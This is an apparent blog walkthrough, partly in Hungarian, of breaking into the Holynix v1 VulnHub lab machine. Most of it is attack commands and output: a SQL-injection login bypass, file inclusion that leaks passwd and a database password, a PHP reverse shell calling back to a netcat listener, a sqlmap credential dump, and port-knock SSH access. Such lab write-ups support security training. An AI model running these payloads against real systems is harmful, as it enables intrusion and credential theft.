Letöltés : http://vulnhub.com/entry/holynix_v1,20/
Mac address : findstr "ethernet0.g" holynix.vmx
ethernet0.generatedAddress = "00:0c:29:bc:05:de"
ethernet0.generatedAddressOffset = "0"
VirtualBox. New machine, Host Only network, change mac address 000c29bc05de
Scanning:
1.Checking live systems
netdiscover -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.56.1 08:00:27:00:9c:e8 01 060 CADMUS COMPUTER SYSTEMS
192.168.56.100 08:00:27:a5:50:60 01 060 CADMUS COMPUTER SYSTEMS
192.168.56.102 00:0c:29:bc:05:de 01 060 VMware, Inc.
2. Check open ports
unicornscan 192.168.56.1023.fingerprint the os & services
TCP open http[ 80] from 192.168.56.102 ttl 64
nmap -sV -sS -O 192.168.56.102 -pT:804. scan for vulnerabilities
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-09 14:22 CET
Nmap scan report for 192.168.56.102
Host is up (0.00086s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)
MAC Address: 00:0C:29:BC:05:DE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.24 - 2.6.25 (99%), Linux 2.6.35 (95%), Linux 2.6.22 (SPARC) (95%), Linux 2.6.9 - 2.6.33 (94%), Linux 2.6.22 (embedded, ARM) (93%), Linux 2.6.16 (93%), Linksys WRV54G WAP (93%), Linux 2.6.18 - 2.6.24 (93%), ipTIME PRO 54G WAP (93%), Android 4.0.4 (Linux 2.6) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.33 seconds
nikto -host 192.168.56.102
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.56.102
+ Target Hostname: 192.168.56.102
+ Target Port: 80
+ Start Time: 2013-11-09 14:25:53 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.12
+ The anti-clickjacking X-Frame-Options header is not present.
+ PHP/5.2.4-2ubuntu5.12 appears to be outdated (current is at least 5.4.4)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php?page=../../../../../../../../../../etc/passwd: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=../../../../../../../../../../boot.ini: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-2562: /login/sm_login_screen.php?error=\">: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: /login/sm_login_screen.php?uid=\">: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3092: /home/: This might be interesting...
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 13372, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.
+ /index.php?module=PostWrap&page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt??: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page[path]=http://cirt.net/rfiinc.txt??&cmd=ls: PHP include error may indicate local or remote file inclusion is possible.
+ /login.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 24 item(s) reported on remote host
+ End Time: 2013-11-09 14:26:06 (GMT1) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
dirb http://192.168.56.102/Enumeration
-----------------
DIRB v2.03
By The Dark Raver
-----------------
START_TIME: Sat Nov 9 14:27:06 2013
URL_BASE: http://192.168.56.102/
WORDLIST_FILES: wordlists/common.txt
-----------------
GENERATED WORDS: 1942
---- Scanning URL: http://192.168.56.102/ ----
+ http://192.168.56.102/cgi-bin/
(FOUND: 403 [Forbidden] - Size: 330)
+ http://192.168.56.102/footer
(FOUND: 200 [Ok] - Size: 63)
+ http://192.168.56.102/header
(FOUND: 200 [Ok] - Size: 604)
+ http://192.168.56.102/home
(FOUND: 200 [Ok] - Size: 109)
+ http://192.168.56.102/img/
==> DIRECTORY
+ http://192.168.56.102/index
(FOUND: 200 [Ok] - Size: 776)
+ http://192.168.56.102/login
(FOUND: 200 [Ok] - Size: 342)
+ http://192.168.56.102/misc/
==> DIRECTORY
+ http://192.168.56.102/transfer
(FOUND: 200 [Ok] - Size: 44)
+ http://192.168.56.102/upload/
==> DIRECTORY
+ http://192.168.56.102/~bin/
==> DIRECTORY
+ http://192.168.56.102/~mail/
==> DIRECTORY
+ http://192.168.56.102/~sys/
==> DIRECTORY
---- Entering directory: http://192.168.56.102/img/ ----
+ http://192.168.56.102/img/index
(FOUND: 200 [Ok] - Size: 26)
---- Entering directory: http://192.168.56.102/misc/ ----
+ http://192.168.56.102/misc/index
(FOUND: 200 [Ok] - Size: 26)
---- Entering directory: http://192.168.56.102/upload/ ----
+ http://192.168.56.102/upload/index
(FOUND: 200 [Ok] - Size: 26)
---- Entering directory: http://192.168.56.102/~bin/ ----
+ http://192.168.56.102/~bin/cat
(FOUND: 200 [Ok] - Size: 27312)
+ http://192.168.56.102/~bin/cp
(FOUND: 200 [Ok] - Size: 71664)
+ http://192.168.56.102/~bin/date
(FOUND: 200 [Ok] - Size: 55820)
+ http://192.168.56.102/~bin/dir
(FOUND: 200 [Ok] - Size: 92376)
+ http://192.168.56.102/~bin/ip
(FOUND: 200 [Ok] - Size: 183288)
+ http://192.168.56.102/~bin/login
(FOUND: 200 [Ok] - Size: 35272)
+ http://192.168.56.102/~bin/ls
(FOUND: 200 [Ok] - Size: 92376)
+ http://192.168.56.102/~bin/more
(FOUND: 200 [Ok] - Size: 27752)
+ http://192.168.56.102/~bin/mount
(FOUND: 200 [Ok] - Size: 81368)
+ http://192.168.56.102/~bin/mt
(FOUND: 200 [Ok] - Size: 28492)
+ http://192.168.56.102/~bin/netstat
(FOUND: 200 [Ok] - Size: 101228)
+ http://192.168.56.102/~bin/ping
(FOUND: 200 [Ok] - Size: 30856)
+ http://192.168.56.102/~bin/ps
(FOUND: 200 [Ok] - Size: 65360)
+ http://192.168.56.102/~bin/pwd
(FOUND: 200 [Ok] - Size: 27252)
+ http://192.168.56.102/~bin/tar
(FOUND: 200 [Ok] - Size: 234132)
---- Entering directory: http://192.168.56.102/~mail/ ----
---- Entering directory: http://192.168.56.102/~sys/ ----
+ http://192.168.56.102/~sys/console
(FOUND: 403 [Forbidden] - Size: 334)
+ http://192.168.56.102/~sys/core
(FOUND: 403 [Forbidden] - Size: 331)
+ http://192.168.56.102/~sys/disk/
==> DIRECTORY
+ http://192.168.56.102/~sys/full
(FOUND: 200 [Ok] - Size: 0)
+ http://192.168.56.102/~sys/input/
==> DIRECTORY
+ http://192.168.56.102/~sys/log
(FOUND: 403 [Forbidden] - Size: 330)
+ http://192.168.56.102/~sys/net/
==> DIRECTORY
+ http://192.168.56.102/~sys/null
(FOUND: 200 [Ok] - Size: 0)
+ http://192.168.56.102/~sys/random
(FOUND: 200 [Ok] - Size: 0)
---- Entering directory: http://192.168.56.102/~sys/disk/ ----
---- Entering directory: http://192.168.56.102/~sys/input/ ----
---- Entering directory: http://192.168.56.102/~sys/net/ ----
-----------------
DOWNLOADED: 19420 - FOUND: 31
4.enumeration services
Mantra http://192.168.56.1025. input fields
index.php?page=login.php6.break login procedure
enable hack bar, enable post data, load url7. enumeration
user_name=admin&password=' or (1=1)#&Submit_button=Submit
View page source8. identification
- ?page=employeedir.php
- ?page=messageboard.php
- ?page=calender.php
- ?page=upload.php
- ?page=ssp.php
- ?do=logout
Cookie: uid=19. more enumeration
Cookies Manager Edit uid 1,2,3,4,5,6,7,8,9,10,11
employeedir.php
- img/blabla.jpg
- email addresses , usernames?
messageboard.php
- knockknock
- Changetrack
calender.php
- nothing
upload.php
- Fájl feltöltése valahova
- transfer.php
ssp.php
- Local File Inclusion error
- text_file_name=ssp%2Femail.txt&B=Display+File
fimap -s -b --cookie="uid=2" --post="text_file_name=ssp%2Femail.txt&B=Display+File" -u "http://192.168.56.102/index.php?page=ssp.php"- text_file_name=/etc/passwd&B=Display+File
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
Blind FI-error checking enabled.
SingleScan is testing URL: 'http://192.168.56.102/index.php?page=ssp.php'
[15:32:43] [OUT] Inspecting URL 'http://192.168.56.102/index.php?page=ssp.php'...
[15:32:43] [INFO] Fiddling around with URL...
[15:32:43] [INFO] Sniper failed. Going blind...
[15:32:44] [OUT] Possible file inclusion found blindly! -> 'http://192.168.56.102/index.php?page=ssp.php' with POST-Parameter 'text_file_name'.
[15:32:44] [OUT] Identifying Vulnerability 'http://192.168.56.102/index.php?page=ssp.php' with Parameter 'text_file_name' blindly...
[15:32:44] [WARN] Unknown language - Autodetecting...
[15:32:44] [INFO] Autodetect thinks this could be a PHP-Script...
[15:32:44] [INFO] If you think this is wrong start fimap with --no-auto-detect
[15:32:44] [INFO] Testing file '/etc/passwd'...
[15:32:44] [INFO] Testing file '/proc/self/environ'...
[15:32:44] [INFO] Testing file 'php://input'...
[15:32:44] [INFO] Testing file '/var/log/apache2/access.log'...
[15:32:44] [INFO] Testing file '/var/log/apache/access.log'...
[15:32:44] [INFO] Testing file '/var/log/httpd/access.log'...
[15:32:44] [INFO] Testing file '/var/log/apache2/access_log'...
[15:32:44] [INFO] Testing file '/var/log/apache/access_log'...
[15:32:44] [INFO] Testing file '/var/log/httpd/access_log'...
[15:32:44] [INFO] Testing file 'http://www.phpbb.de/index.php'...
##################################################################
#[1] Possible PHP-File Inclusion #
##################################################################
#::REQUEST #
# [URL] http://192.168.56.102/index.php?page=ssp.php #
# [POST] text_file_name=ssp%2Femail.txt&B=Display+File #
# [HEAD SENT] Cookie #
#::VULN INFO #
# [POSTPARM] text_file_name #
# [PATH] Not received (Blindmode) #
# [OS] Unix #
# [TYPE] Blindly Identified #
# [TRUNCATION] Not tested. #
# [READABLE FILES] #
# [0] /etc/passwd #
##################################################################
root:x:0:0:root:/root:/bin/bashError message: text_file_name=ssp%2a&B=Display+File
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:114:MySQL Server,,,:/var/lib/mysql:/bin/false
alamo:x:1000:115::/home/alamo:/bin/bash
etenenbaum:x:1001:100::/home/etenenbaum:/bin/bash
gmckinnon:x:1002:100::/home/gmckinnon:/bin/bash
hreiser:x:1003:50::/home/hreiser:/bin/bash
jdraper:x:1004:100::/home/jdraper:/bin/bash
jjames:x:1005:50::/home/jjames:/bin/bash
jljohansen:x:1006:115::/home/jljohansen:/bin/bash
ltorvalds:x:1007:113::/home/ltorvalds:/bin/bash
kpoulsen:x:1008:100::/home/kpoulsen:/bin/bash
mrbutler:x:1009:50::/home/mrbutler:/bin/bash
rtmorris:x:1010:100::/home/rtmorris:/bin/bash
Warning: fopen(ssp*) [function.fopen]: failed to open stream: No such file or directory in /var/apache2/htdocs/ssp.php on line 29ssp.php : text_file_name=ssp.php&B=Display+File
Warning: stream_get_contents() expects parameter 1 to be resource, boolean given in /var/apache2/htdocs/ssp.php on line 30
Warning: fclose(): supplied argument is not a valid stream resource in /var/apache2/htdocs/ssp.php on line 31
index.php : text_file_name=index.php&B=Display+File
<!--?php
if ( $auth == 0 ) {
echo "<center--><h2>Content Restricted</h2>";
} else {
echo "<center><h4><b>Standard Security Practices</b></h4></center><p>";
echo "</p><form method="\"POST\"" action="\""" .$_server['script_name']="" .="" "?"="" $_server['query_string']="" "\"="">";
echo "<p><select size="1" name="text_file_name">";
echo "<option value="ssp/email.txt">Email";
echo "</option>";
echo "<option value="ssp/acceptable_use.txt">Acceptable Use";
echo "</option>";
echo "<option value="ssp/internet_use.txt">Internet Use";
echo "</option>";
echo "<option value="ssp/software_installation.txt">Software Installation";
echo "</option>";
echo "<option value="ssp/malware.txt">Malware";
echo "</option>";
echo "<option value="ssp/auditing.txt">Auditing";
echo "</option>";
echo "</select></p>";
echo "<p><input value="Display File" name="B" type="submit"></p>";
echo "</form>";
echo "<pre>";
$textfilename=$_REQUEST["text_file_name"];
if ($textfilename <>"") {
$handle = fopen($textfilename, "r");
echo stream_get_contents($handle);
fclose($handle);
}
echo "</pre>";
}
?>
<!--?php
include ("header.php");
// Grab inputs
$page = $_GET[page];
if ($page=="") { include ("home.php"); }
else {
$query = "SELECT location FROM page WHERE location = '". $page ."'";
$result = mysql_query($query);
$row = mysql_fetch_array($result, MYSQL_ASSOC);
if ( file_exists($row{'location'}) ) { include($row{'location'}); } else { include("404.html"); }
}
include ("footer.php");
?-->
home.php
<!--?php
if ( $auth == 0 ) { echo "<center--><h3>You must login to access restricted content</h3>"; }
if ( $auth == 1 ) { echo "<center><h3>Welcome to the Nakimura Industries Production Server</h3></center>"; }
?-->
login.php :
<!--?php
if ($failedloginflag==1) {
echo '<h2--><font color="#ff0000">Bad user name or password!</font>';
echo "If you continue to have problems logging in contact<br>the system administrator at ltorvalds@example.net<br><br>";
}
echo "<form method="\"POST\"" action="\""" .$_server['script_name']="" .="" "?"="" $_server['query_string']="" "\"="">";
?>
<p>Enter your username and password:</p>
<p>Name:<br><input name="user_name" size="20" type="text"></p>
<p>Password:<br><input name="password" size="20" type="password"></p>
<p><input value="Submit" name="Submit_button" type="submit"></p>
</form>
<!--?php
?-->
header.php
A header.php-t alapból nem lehetett lekérdezni ezért ezt WebScarab segítségével tudtam kiprintelni.
A lényeges és fontos dolgok ebben voltak az autentikációval kapcsolatban:
<?php
include '../config.inc';
include '../opendb.inc';
// Grab inputs
$username = $_REQUEST["user_name"];
$password = $_REQUEST["password"];
$surname = $_REQUEST["surname"];
$dosomething = $_REQUEST["do"];
if ($username <> "" and $password <> "") {
$query = "SELECT * FROM accounts WHERE username='". $username ."' AND password='".stripslashes($password)."'";
$result = mysql_query($query) or die('<b>SQL Error:</b>' . mysql_error($conn) . '<p><b>SQL Statement:</b>' . $query);
if (mysql_num_rows($result) > 0) {
$row = mysql_fetch_array($result, MYSQL_ASSOC);
setcookie("uid", $row['cid']);
$failedloginflag=0;
echo '<meta http-equiv="refresh" content="0;url=index.php">';
} else {
$failedloginflag=1;
}
}
switch ($dosomething) {
case "logout":
setcookie('uid','',1);
break;
}
?>
<html><head>
<?php
if ($dosomething == "logout") {
echo '<meta http-equiv="refresh" content="0;url=index.php">';
$auth = 0;
}
?>
</head>
<body bgcolor="#00bbcc">
<table border="0" width="100%" cellspacing="0" cellpadding="0">
<tr><td bgcolor="#00bbcc"align="center" colspan="2">
<table width="100%">
<td valign="top"><br></td>
<td align="center" valign="top"><h1><b>Nakimura Industries Production Server</b></h1>
<?php
$query = "SELECT * FROM accounts WHERE cid='".$_COOKIE["uid"]."'";
$result = mysql_query($query) or die('Error Connecting to Database');
echo mysql_error($conn);
echo mysql_error($conn);
if (mysql_num_rows($result) > 0) {
while($row = mysql_fetch_array($result, MYSQL_ASSOC))
{
$logged_in_user = $row['username'];
$upload = $row['upload'];
$auth = 1;
echo "Welcome, " .$logged_in_user. ".";
}
} else {
$logged_in_user = "anonymous";
$auth = 0;
echo '<font color="#ff0000">Not logged in</font>';
}
?>
</td>
</table>
</td></tr>
<tr>
<td bgcolor="#00bbcc" valign="top" width="12%">
<hr>
<a href="index.php">Home</a><br>
<?php
if ( $auth == 0 ) { echo "<a href='?page=login.php'>Login</a><br />"; }
if ( $auth == 1 ) {
echo "<a href='?page=employeedir.php'>Directory</a><br />";
echo "<a href='?page=messageboard.php'>Message Board</a><br />";
echo "<a href='?page=calender.php'>Calender</a><br />";
echo "<a href='?page=upload.php'>Upload</a><br />";
echo "<a href='?page=ssp.php'>Security</a><br />";
echo "<a href='?do=logout'>Logout</a><br />";
}
?>
<hr>
</td>
<td valign="top" width="80%">
<blockquote>
../config.inc
<?php../opendb.inc
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = 'mY5qLr007p@S5w0rD';
$dbname = 'creds';
?>
$conn = mysql_connect($dbhost, $dbuser, $dbpass) or die('Error connecting to mysql');
mysql_select_db($dbname) or die('Error Opening DatabaseSQL Error:' . mysql_error($conn) . 'SQL Statement:' . $query);
?>
upload.php : text_file_name=upload.php&B=Display+File
<!--?phptransfer.php
if ( $auth == 0 ) {
echo "<center--><h2>Content Restricted</h2>";
} else {
echo "<h3>Home Directory Uploader</h3>";
echo "<form enctype="multipart/form-data" action="index.php?page=transfer.php" method="POST">";
echo "Please choose a file: <input name="uploaded" type="file"><br>";
echo "<input name="autoextract" value="true" type="checkbox"> Enable the automatic extraction of gzip archives.<br>";
echo "<input value="Upload" type="submit"></form>";
}
?>
update_own
<!--?php
if ( $auth == 0 ) {
echo "<center--><h2>Content Restricted</h2>";
} else {
if ( $upload == 1 )
{
$homedir = "/home/".$logged_in_user. "/";
$uploaddir = "upload/";
$target = $uploaddir . basename( $_FILES['uploaded']['name']) ;
$uploaded_type = $_FILES['uploaded']['type'];
$command=0;
$ok=1;
if ( $uploaded_type =="application/gzip" && $_POST['autoextract'] == 'true' ) { $command = 1; }
if ($ok==0)
{
echo "Sorry your file was not uploaded";
echo "<a href="?index.php?page=upload.php">Back to upload page</a>";
} else {
if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
{
echo "<h3>The file '" .$_FILES['uploaded']['name']. "' has been uploaded.</h3><br>";
echo "The ownership of the uploaded file(s) have been changed accordingly.";
echo "<br><a href="?page=upload.php">Back to upload page</a>";
if ( $command == 1 )
{
exec("sudo tar xzf " .$target. " -C " .$homedir);
exec("rm " .$target);
} else {
exec("sudo mv " .$target. " " .$homedir . $_FILES['uploaded']['name']);
}
exec("/var/apache2/htdocs/update_own");
} else {
echo "Sorry, there was a problem uploading your file.<br>";
echo "<br><a href="?page=upload.php">Back to upload page</a>";
}
}
} else { echo "<br><br><h3>Home directory uploading disabled for user " .$logged_in_user. "</h3>"; }
}
?>
#!/bin/bash
sudo chown root:root /home/
sudo chown -R alamo:developers /home/alamo/
sudo chown -R nobody:developers /home/development/
sudo chown -R etenenbaum:users /home/etenenbaum/
sudo chown -R gmckinnon:users /home/gmckinnon/
sudo chown -R hreiser:staff /home/hreiser/
sudo chown -R jdraper:users /home/jdraper/
sudo chown -R jjames:staff /home/jjames/
sudo chown -R jljohansen:developers /home/jljohansen/
sudo chown -R kpoulsen:users /home/kpoulsen/
sudo chown -R ltorvalds:admin /home/ltorvalds/
sudo chown -R mrbutler:staff /home/mrbutler/
sudo chown -R rtmorris:users /home/rtmorris/
Exploit (reverse php shell)
nc -l -v -p 1234
listening on [any] 1234 ...
Set Cookie: uid=2
pico revshell.php
$ip = '192.168.56.101'; // CHANGE THIS
tar cvzf revshell.tar.gz revshell.php
upload revshell.tar.gz
http://192.168.56.102/~etenenbaum/revshell.php
192.168.56.102: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 58391
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux
14:58:25 up 5:07, 0 users, load average: 0.13, 0.03, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$
$ ls /etc/knockknock.d/profiles
alamo
etenenbaum
gmckinnon
hreiser
jdraper
jjames
jljohansen
kpoulsen
ltorvalds
mrbutler
rtmorris
$ ls /etc/knockknock.d/profiles/etenenbaum -al
total 24
drwxr-xr-x 2 root root 4096 Dec 1 2009 .
drwxr-xr-x 13 root root 4096 Nov 8 2010 ..
-rw-r--r-- 1 root root 25 Dec 1 2009 cipher.key
-rw-r--r-- 1 root root 27 Dec 1 2009 config
-rw-r--r-- 1 root root 3 Nov 18 19:02 counter
-rw-r--r-- 1 root root 25 Dec 1 2009 mac.key
$ cat /etc/knockknock.d/profiles/etenenbaum/*
WC8pOHq67KHzuYEvH9qPRA== <- cipher.key="" i="">
[main] <- config="" i="">
knock_port = 13821
32 <- counter="" i="">
OcOlArxJEvH7iecDOZGAmw== <- i="" mac.key="">
Exploit (sql injection)
index.php:
$query = "SELECT location FROM page WHERE location = '". $page ."'";
header.php:
$query = "SELECT * FROM accounts WHERE username='". $username ."' AND password='".stripslashes($password)."'";
$query = "SELECT * FROM accounts WHERE cid='".$_COOKIE["uid"]."'";
sqlmap -u "http://192.168.56.102/index.php?page=login.php" --cookie="uid=2" --level=5 --risk=5
[WARNING] GET parameter 'page' is not injectable
[WARNING] Cookie parameter 'uid' is not injectable
sqlmap -u "http://192.168.56.102/index.php?page=login.php" --data="user_name=admin&password=pass&Submit_button=Submit"
--dbs
available databases [4]:
[*] clients
[*] creds
[*] information_schema
[*] mysql
--dump-all
cat /usr/share/sqlmap/output/192.168.56.102/dump/creds/accounts.csv
cid,upload,username,password
1,0,alamo,Ih%40cK3dM1cR05oF7
2,1,etenenbaum,P3n7%40g0n0wN3d
3,1,gmckinnon,d15cL0suR3Pr0J3c7
4,1,hreiser,Ik1Ll3dNiN%40r315er
5,1,jdraper,p1%40yIngW17hPh0n35
6,1,jjames,%40rR35t3D%40716
7,1,jljohansen,m%40k1nGb0o7L3g5
8,1,kpoulsen,wH%407ar37H3Fed5D01n
9,0,ltorvalds,f%407H3r0FL1nUX
10,1,mrbutler,n%405aHaSw0rM5
11,1,rtmorris,Myd%40d51N7h3NSA
Exploit ssh:
mkdir .knockknock && cd .knockknock && mkdir 192.168.56.102 && cd 192.168.56.102
echo WC8pOHq67KHzuYEvH9qPRA== > cipher.key
echo [main]> config
echo knock_port = 13821 >> config
echo 32 > counter
echo OcOlArxJEvH7iecDOZGAmw== > mac.key
root@kali:~/knockknock-0.7# python knockknock.py -p 22 192.168.56.102
*** Success: knock sent.
ssh gmckinnon@192.168.56.102
gmckinnon@192.168.56.102's password: <- d15cl0sur3pr0j3c7="" i="">
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
gmckinnon@holynix:~$
gmckinnon@holynix:~$ sudo -l
User gmckinnon may run the following commands on this host:
(root) /bin/false
gmckinnon@holynix:~$ uname -a
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux
Next Phase: Privilege escalation......
root@kali:~# searchsploit changetrack
Description Path
--------------------------------------------------------------------------- -------------------------
Changetrack 4.3-3 Local Privilege Escalation Vulnerability /linux/local/9709.txt
Nincsenek megjegyzések:
Megjegyzés küldése
Megjegyzés: Megjegyzéseket csak a blog tagjai írhatnak a blogba.